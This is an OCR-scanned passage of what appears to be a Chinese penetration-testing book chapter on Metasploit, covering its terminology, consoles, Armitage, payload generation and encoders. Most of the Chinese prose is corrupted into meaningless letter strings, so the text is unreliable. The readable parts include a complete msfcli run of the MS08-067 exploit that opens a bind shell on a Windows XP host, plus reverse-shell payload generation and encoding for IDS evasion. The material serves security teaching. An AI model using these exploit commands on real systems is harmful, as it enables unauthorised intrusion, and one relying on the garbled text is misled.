AULATT EED IT AE EP EMI 2 SOE HE ESE A AH AAT i A? EBERT, RE MAME EER ST, BRI, DPE FRUR ORT NTC A tis, ABC AAI ME, AU GE BE EE BB RS BK ADT FAR, THEA SIRNA, ABR — TRB RABY, AGORA, MPRA, RMT NERA, TAMER EE fe. 1.1.7 REE RAGE ANLL TN EBEUAL, ORR AOS RNR TS, Sap, A Bey HE hae fF fs RT TL eS CORTESE, EM AY BRET LAPIN, REST te D> BN, mi EMM Rh A FH ASB SS FT eR A HOOT. SIREN, BIER OBR, RTO HALLO RMIT EIR, BANE. WRT RI Re eR, TAO ARIUS AT LART TRS LEED A aE. AUER OLENA), BRAD PHES BMS PAA, GD LM EHR. BI, ASHE RPAH Web SURLRRFETHRH T —P SQL PE AGRI, sds HEARS HIE ALANA REA Os (2 POP MP AETHER, (ERS ALIN SOL BARE AD, ZEEE PR ESEAT SQL HEA), BABAR HT AAEM HAMAS SOR HI PIR TRE SEAS TM ET SQL EARIAZ AG, TAMURA HEAT SQL HE ABaL Tm? ALI! —AARAT AE PH SQL te dab TARE HAS DEED TAR MERE RO LITE NR a RULER, IPRA SUTRA A RE. 1.2 Bw Mitee SME L, MOAN SAMRVBARAT SA WH T— POI TR, AE PRL RNKFHBAMRHAHEARH, ORAS RAM. AMR, AMM “AOE WR", AABAMRA EH SPARTA DAR PET MR, io AR By BU —PNS PAR BM SES LT Eh. PR eA A AB Sik PAMRRARA 1.2.1 Amat RA ARMR, HBAS AMAA ie LE, RAE RE, REN IT 5C FPA ASS fe RA EGE, RU A TA BRST, SH nL DPE AS GSE eH EI AF EHS A 5 TT SK dE FE AAT HUAN EP AS PEs A AAT Se Ph a HD FOR. AO SRINY Ta) -Ar AR, Re A A RAE REZ A, BA TAT BE EAE IT. 1.22 ReMit SARWRAANE, SLO MAMIE Li NAM ART. ERT BER SOK DIME ERA RARE F SICA «RAR LF Ak Be 4 AH AT, UCB AVE ID» RAWAL RAN, ANBAR AS SRNR ARE A. ERA HRA, RAWAM, DN ERE T UREN. ACU SLAC US HE A LOR ERE, Bill, Heb AU A ENAARAR ARAL, TR RAI PAAR RT PRR SSL BEE, FORE AONE. 1.3 Wasa eS SAAS AE FA Fe HEB Be BT SH AR a WAR RARE RRS SRA SA, UR TETAS. —B OR PRARRANRERRERSAM, HH UA A SUT — A EMME, RE PERBELLA MT. WRX EARNER TMA, TSE Ee A MPRA, ETERS REAR ARAL Re BTA TAT EE RAR OAS TRAE RR, HES RS A I EAR RUCATNRA, SUERTE, RD TAAL. I hep tts BY 7 AAR ORR PED. SRW ETE FCF ARIAL ee A he TAG A a BALE TARA HAUT NS 2 PAR BAT BE AML, A RAEN). BAMRNROZ MEP ERE-TTR ANAT, Re RSE GAAKBES HARARE. EKER, SRA LAR EMITZ a, HOt ARS OT BTA AR, DAE NOR 1 CY RA Ne ER RB, Metasploit Sis Mist te 14 ING ORAS 2 IBALL, AER TR MEIKE. ED — FR DUT ARNE PTES. AEUET (ETS. BUT —UISMAR, TAMIA HT — PAI. ATS PRAT, TET RAT ES EA BSN IAS. 6d MURA Hh ED SSW UTERE, TREAT REACH, RTE RECS MMR Ty RM SO PRN MZ f c Metasploit ii AR — KBAR Metasploit SM AKER IE (MSF) MY, MA] RES BE HME ome ae HI Fy, GL. RRR AT, TORIC RTE. AEASEH. SUPRA Metasploit JE, SAREE A BY DUIEAEHY Metasploit i Fp Hit — ARSE, UE PRR AL HE Meetasploit MYIE ASI RAGA AAR HEANOR, RHA Metasploit PERG IA TEAL He 11. Metasploit AAAI, ERPS RARE, (A Metasploit te 4746 FP IA. 728 —UE Metasploit if, (REM AR: AOL EF AER eM BUR, TA SMOKE Metasploit MT UET BAY, WA BR HHT LAE Fe thy SR AER SE. 2.1 SMR TERA, BUT PAAR, Ze Ge AEE. RE OA JEHE Metasploit AER FREE UEAT EIN, EMM EATEN AEE he el FRA SL Metasploit SiS Mitte 2.1.1 iBiBWH (Exploit) BR RAE AH ARAM RAAA TR. WARIS PRE. TREAT AY BHT. Mi ARNBRRHEARRAN, EERE RIT R AA Ee JR. MUTANS MMA IGE REL, Web MALIA (Hid SQL HEAD, LAA FARCE BES. 2.1.2 Waretty (Payload) et Bij ERA VM ASE BBA ZG LAIMTORE, 2 Metasploit HESS A LL EL WARREFR. PRAT. Gl, RHRSK shell EAHA FARA PL Beat EBL Oe ERE. HE EGLO SAT shell AV ARMS WLI 5 KE), 7A bind shell Were MAE A be EAL LHF AAT shell SOB UAT FPA RT be RET he I EH AG shell AEH» Beat Aa tts PY BEE Hh RINE ARE REA LatT -e >, RMA PKS. 2.1.3 Shellcode Shellcode A275 3836 BC 1 A Wty BAIEAT [ — HAL ABHE > . Shellcode 38 Hf LIC Mai Fi He EXLMAARE, ARRRATT Shellcode XR—-MHS Zia, FAH — Pa SAT shell BLtt Meterpreter shell, iXt# Jz Shellcode % PEIN HK. 2.1.4 #82 (Module) ATI L PSR T, —/MRBRHH Metasploit (ERT ITA — BPA. Ze MRT AR, PRAT AES EH “NB ERTL (exploit module), HM ATSC RAB Bec ARAL. TICESUINR, SWE REAR “MBP (auxiliary module), HURST — Se HARA RELA LEE. ASEAN WISE AUR EP REE Metasploit HEALERS BUDA. 2.1.5 asit#® (Listener) AUPE Metasploit ALKA AEA AERA, AOR, Coo EWS 2 CHORALE RMR AEA L, MOTE EA Le ASAE, HTT ME ee 2.2. Metasploit RP#O Metasploit (42 MERA T SPANO, A. OTR 2% Metasploit Bit E.R TRA ZI, REALAR Cunilities> su 88 4 SAF Metasploit HEA A ALI REAY EL Dy li, IAAL Ty REAR FE RE TBR RAG ITC, ABR AE AE OR AN GE EERE RE NH PE AHA. 2.2.1 MSF Si MSF #34 (msfconsole ) 4 A fi Metasploit HEAE AE AMAT HD EO, MIA ALARA AAT Ba2y MSF #8084 Metasploit HESS JB i8. DIARIES Uh RIF RE AZ —. MSF SRE GET WAU, AEGSUS I) Metasploit HERR /LY RE — PEM AAR, PURE LELE REESE SPATS BC AY ITH. Yay DU MSF SC EAT SE, CNR — YU Be. RR BIR, SPEAR. RUMORS, BRA ME NR UT BEB. AMEE Metasploit HERZEAMT MAILE RT, EM it SSR ERR AE. LL PASE MSP FMA AIA, (RAT ULE 1 Metasploit DT ER. HEAR A MEP, BUN ARE GH MSF SRE ATLAS. © ta MSF Aa JAS) MSF SOREN, RaGEZE dD SATA msfconsole. rootebt:/# cd /opt/framework3/ns¥3/ roota@bt : /opt/franework/ms#3# msfconsole < metasploit > \ \ (o)__ CW II--1] * msf > Oy] MSF OHH HE, RE BEMA help, IFAs LLMn_b MATAR ABA metasploit > » TE PRP OLED, BUR connect fr RMR EMI AB, Pare aT EL SO BUNS AEST I. ERHARD META, Nk SHR, UREA AINE em. msf > help connect PRATHEZE EERE BRA HERR Tf MSF S83. 2.2.2 MSF ttt MSF fir 2474 MSF #8389 Metasploit #2381 FASE BET PAAR TARE. MSF chim Uh A PAE RE ET ah, PERT. iN msfoli 3 ey ce 9 Metasploit 7 ita AMEE ALS Her 47 TELA ER HEPES Msfeli PILAR At O47 shell 347, FERRET Ff ih Here Ze msfeli 1, DL AoKF msfeli AIH HSE MS OT SL. msfeli KEE BRAG UWA, Be My He A ORAL TE AR TB AL AR ORT ES OH Re EATS CG BEY NS LH RA IG BON, CEA ES DHA LA. msfeli EGET HAIN BOR CELE AH BAI — MS), FY BAM i msfli -h fr saEAT GAs rootabt pt/Framework3/msf3# msfcli -h (Help You're looking at it, baby! (S)unmary Show information about this module (0)ptions Show available options for this module (A)dvanced Show available advanced options for this module (1)DS Evasion Show available ids evasion options for this module (P)ayloads Show available payloads for this module (Targets Show available targets for this exploit module (AC) tions Show available actions for this auxiliary module (Check Run the check routine of the selected module (E)xecute Execute the selected module _Toot@bt: /opt/Framework3/ns f3# © Hal ALBUDRA BR msfeli, TAZA SE AMER, kha EI RAL MRT LBA MED A — TE EDR SORHUFFEEE] Metasploit, 3-23 5) AME ARIE HL A tr > BBCI AR. RAT LATE ORT ARETE eS ML — PP CO”, RAT BAMA MM ESR. ERY WET, RAVENS “O” HALA ms08_067_netapi MARNE SRAM. Toot@bt:/# asfeli windows/smb/nso8_067 netapi 0 [*] Please wait while we load the module tree... Name Current Setting Required Description RHOST 0.0.0.0 yes The target address RPORT 445, yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) SLAY DAA BUX MAR = SABI: RHOST. RPORT fil SMPIPE. BRE, dE -+ FER”, PRR AT RAO TET A A aH. 10 2% Metasploit Hit msfcli windows/smb/mso8_067_netapi RHOST=192.168.1.155 P wait while we load the module tree... pay] Name generic/debug_trap Generate 2 debug trap in the target process generic/shell_bind tcp Listen for a connection and spawn a command shell NRA B REMIT AL GRR, IRE TBR ZL, RT Ty LUGE msfeli Min ae 1 a ee OE”, ETM, A Bia: Toot@bt:/# msfcli windows/snb/ns08_067_netapi RHOST=192.168.1.155 PAYLOAD=windows/shell /bind_tep E [*] Please wait while we load the module tree... [+] Started bind handler [+] Automatically detecting the target... [+] Fingerprint: Windows XP Service Pack 2 - lang:English [+] Selected Target: windows xP SP2 English (NK) [+] Triggering the vulnerability... [+] Sending stage (240 bytes) [+] Consiand shell session 1 opened (192.168.1.101:46025 -> 192.168.1.155:4444) Microsoft Windows XP [Version 5.1.2600] (©) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\systen32> RAIRAT! AARNEAMBRARLSB T—* Windows tr 4Tih shell. 2.2.3 Armitage Metasploit HESS "P ff) armitage 481} —S 562 30H shi FEAL A Pe, i Raphael Mudge FPR IRM OAR RMIT, FREER BRAS. TELA EUSA. RATE PARIRA UE USL Mi armitage HEAL, (EMAAR G OSPR. BUY BRL UEARAIZS OF Metasploit BNA ALDH, it~ FAR TRE T Metasploit HRA TRUE, MARE Fm LAR WER. © i847 Armitage As OT UT EMT armitage tka) armitage. ZEAE, kee “Start MSF”, ixAE LAT LLiE armitage FEHEBI¢RY Metasploit S261 E. root@bt:: /opt/framework3/nsf3# armitage armitage JF 2/2 fei» fA) 2 He 28 ab SR Pa] AT A ee BR a A Metasploit Hit, Ki, 2-1 BR TRTHS CAPR) BR. 11 Metasploit #2 0ti8 01 FE 2-1 armitage (HB Ni Rei aD oi SE A 2.3 Metasploit ) AE%EFF EA WSILT Metasploit (f§ =P BAO Za, BER] DURST — He Metasploit Sh Rett FET. Metasploit HI) REFEIF BZA IE MHA FE. XY Metasploit HEMET MK — HA ART AEME AT FRE IED, CAG REE A TT. BATTER ST Lh ALES) Metasploit SHABABFR, Hee AS SCRE BATH | A SE A BET. 2.3.1 MSF Wee trt: CBS MSF Scape 4 ALAS IC VE AS AEE AR shellcode, AUPAAT UA AIH he AVA, HAT LL EMER DIEZ INS NS P ET OE. Shellcode AT LAE WRAL C. JavaScript. $28 Web MU/NALIF'} Visual Basic WASTE MS A Rook, SPARS RSC ZEBRA. Lea, CEE Python i ea 4s — BE SRE (POC: Proof of concept), FRA C iH ETRE AUR EIR; SURES — AB SBS, ARAL JavaScript SW AHN shellcode HHEMIMAM, TEMRERE T AT SEE (LA ZF A HI ha LA BS HTML, fe Hb 2 A Be BB 12 2% Metasploit Sei USDA Fi SR AACE, Cet STA msfpayload -h, an FATA: rootebt:/# msfpayload -h 51H msfoli FE, MUR IT RR PARR AIS, PEt bi Za I-A KO”, BRITT RTL A TG A, OR root@bt:/# msfpayload windows/shell_reverse_tcp 0 BATTLE a SEHR BRIT A, HER Ae TS AS MSF Bah er BLE. 2.3.2 MSF Sai938 1 MSF Bee ARCTAE ALAR PME (ty shelleode IGA TM, HUI a 7H null 95, TE MERE PATI, LET RU REE TERR, IAT ORE eT AER TOME LIE AT MIME, LEO Axfh FAFSA PRAY BCT BC « Tibbs TE EAA TE ITY shellcode (RAT HERA ZAM RANA A ATUL, 8 THR IX MI, Metasploit MARA NEE T MSF Has5R8, a) ULF Pi LAY Wah cat a EAT FUN Aish, BRIERE, WARE A IDS ERC. HA. msfencode -h F] L.#t% MSF Sit aS PAE a TH UKE Metasploit 1 T — ABT FI TARAS IRF we A, PEE EAD AF SE RATER MIN AR ACA AL, TOS ARE ATER OCR, SE FEAR RS TST DEE EARS 1B Ph — He SE a He AB AS SAR. PERERA IR, UNTT RG ERB T RAGE AIN x80/shikata_ga_nai #i542%, 7£ Metasploit "PRE——/MALT Excellent 48 (HIS 04 88 » iAP GR He BB — Se) SE ARE HE RET WEST. PMNS, —S Excellent HUF HR ZATE MATER”, Ht ag BT LAE MEK. RRA PE ol ARG, PPT LAAE IH msfencode ft-1 BR, RAB UA AE THE aR root@bt:"# msfencode -1 2.3.3 Nasm Shell nasm_shell.rb SAAEREIF ZEMIN T MICH MER PALA, SES PRAT BENG BA. PRE IL Hit PIL EM opcode MENS, MERE A LEX ATA AEFEPP ATE BD is. 13 Metasploit 2 Mit15 a Lem, 4BAMGATIATD LA, FF jmp esp HHH) opcode HAEFSIN, nasm_shell 42244 VERATIE FF B46 Tootébt:/opt/Framework3/ast3/tools# ./nasm_shell.rb asm > jmp esp 0000000 FFE4 mp esp 2.4 Metasploit Express #1 Metasploit Pro Metasploit Express #1 Metasploit Pro & Metasploit E42 AU FE Web ROME, RIK PEAR GE TARA PTS AGHA. ULTRA) EME AE Sh HE Metasploit c(i. FURY AE OY PRE HET A$ Metasploit HE AE AY se Wi bal BE 1 PN TP AEH HE 1 BEE Metasploit #: ASP Be FTI, Ueto NS SAE LAL A A BE IL, 55h Metasploit Pro fi CORSE, TA MREAWRR ATOKA: BRA. SEE AMA ERN II? FARA A REE. PEMILAC(K) Metasploit Jé URL AN BE WRT ETHER AT. AY DU RIS YT AEP ROAR aE ER HE AT A, (EL PBS EH RT ak AA TERA PTT TT, AT A RE 1, MRAM IA LEN, WR-AEWA, AL ARR AML WK LAH. 2.5 Ma FEAT, (2 TAT Metasploit HER) —HCSEM AE. “4 RMRERI BEAN, ARIE MEAS ARISE TE GSR AA HR BBA BAST TAF Re eA A, ESM, HERAD ABE, BARAT ESKER TARR RAC. PEM CAAT TSM AH REAR MIRAE AE, ASTER eRe ea BRL AA BPE fa ROM. 14

You might also like